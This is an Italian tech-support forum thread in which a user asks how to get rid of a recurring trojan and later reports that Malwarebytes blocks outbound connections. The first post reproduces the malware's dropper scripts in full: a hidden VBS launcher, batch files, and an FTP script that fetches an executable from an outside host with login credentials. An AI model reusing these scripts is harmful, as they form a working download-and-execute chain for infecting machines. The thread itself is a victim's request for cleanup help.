| 	
	
	
		
		|||||||
  | 
		
| 
 | 
![]()  | 
	
	
| 
		 | 
	Strumenti | 
| 		
			
			 | 
		#1 | 
| 
			
			
			
			 Member 
			
		
			
			
			Iscritto dal: Mar 2008 
				
				
				
					Messaggi: 201
				 
				
				
				
				 | 
	
	
	
	
		
			
			 
				
				trojan che continua a tornare
			 
			
		da qualche giorno su c continuano ad apparire 5 files così chiamati:  
		
	
		
		
		
		
		
	
	a.bat ff.bat gz run.vbs aa.exe ho comodo internet security ma tengo la protezione antivirus disabilitata perchè altrimenti il pc si blocca dopo poche ore... comunque comodo rileva lo stesso i file come infetti anche se disattivato e credo che li blocchi, però nonostante li cancelli continuano a tornare.. ecco cosa c'è dentro i file: a.bat -------------------------------------- del c:\run.vbs del c:\a.bat -------------------------------------- ff.bat -------------------------------------- ftp -s:c:\gz c:\aa.exe del c:\gz cmd /c c:\a.bat del c:\ff.bat -------------------------------------- gz -------------------------------------- open f1tp.3322.org f1t f1t binary get b.exe c:\aa.exe bye -------------------------------------- run.vbs -------------------------------------- CreateObject("WScript.Shell").Run "cmd /c c:\ff.bat",0 -------------------------------------- aa.exe invece è zero byte qui ho trovato qualche informazione: http://www.sophos.com/en-us/threat-c...-analysis.aspx qualcuno ha idea di come rimuovere i files una volta per tutte?  | 
| 
		
 | 
	
	
	
		
		
		
		
		
		
			 
		
		
		
		
		
		
			
			
		
	 | 
| 		
			
			 | 
		#2 | |
| 
			
			
			
			 Member 
			
		
			
			
			Iscritto dal: Mar 2008 
				
				
				
					Messaggi: 201
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 
		accedendo al sito ftp f1tp.3322.org si vedono 5 file: 
		
	
		
		
		
		
		
		
			b.bat b.exe b.exe- b.exe.bak b.exe100728 li ho scaricati e ho fatto analizzare b.exe- da virustotal con questi risultati: Quote: 
	
 Ultima modifica di Chill-Out : 16-02-2012 alle 20:58. Motivo: Bastava copiare ed incollare l'url rilasciata a fine scansione  | 
|
| 
		
 | 
	
	
	
		
		
		
		
		
		
			 
		
		
		
		
		
		
			
			
		
	 | 
| 		
			
			 | 
		#3 | 
| 
			
			
			
			 Senior Member 
			
		
			
				
			
			
			Iscritto dal: Apr 2009 
				
				
				
					Messaggi: 702
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 | 
| 
		
 | 
	
	
	
		
		
		
		
		
		
			 
		
		
		
		
		
		
			
			
		
	 | 
| 		
			
			 | 
		#4 | 
| 
			
			
			
			 Member 
			
		
			
			
			Iscritto dal: Mar 2008 
				
				
				
					Messaggi: 201
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 
		ho installato malwarebytes e i file su c non compaiono più però ogni tanto arriva qualche avviso di ip bloccato da malwarebytes (più che altro in uscita) , dal whois sembrerebbero ip cinesi, moldavi o serbi  
		
	
		
		
		
		
		
	
	   comunque la scansione di malwarebytes non rileva nulla
		 | 
| 
		
 | 
	
	
	
		
		
		
		
		
		
			 
		
		
		
		
		
		
			
			
		
	 | 
| 		
			
			 | 
		#5 | 
| 
			
			
			
			 Member 
			
		
			
			
			Iscritto dal: Jun 2011 
				
				
				
					Messaggi: 202
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 
		Ciao, segui la Guida alla disinfezione  http://www.hwupgrade.it/forum/showthread.php?t=1599737 e allega i log secondo le regole di sezione http://www.hwupgrade.it/forum/showthread.php?t=1751598
		 
		
	
		
		
		
		
		
	
	 | 
| 
		
 | 
	
	
	
		
		
		
		
		
		
			 
		
		
		
		
		
		
			
			
		
	 | 
		
		  
	   | 
| Strumenti | |
		
  | 
	
		
  | 
Tutti gli orari sono GMT +1. Ora sono le: 09:57.









		
		
		

  comunque la scansione di malwarebytes non rileva nulla
		
 
 







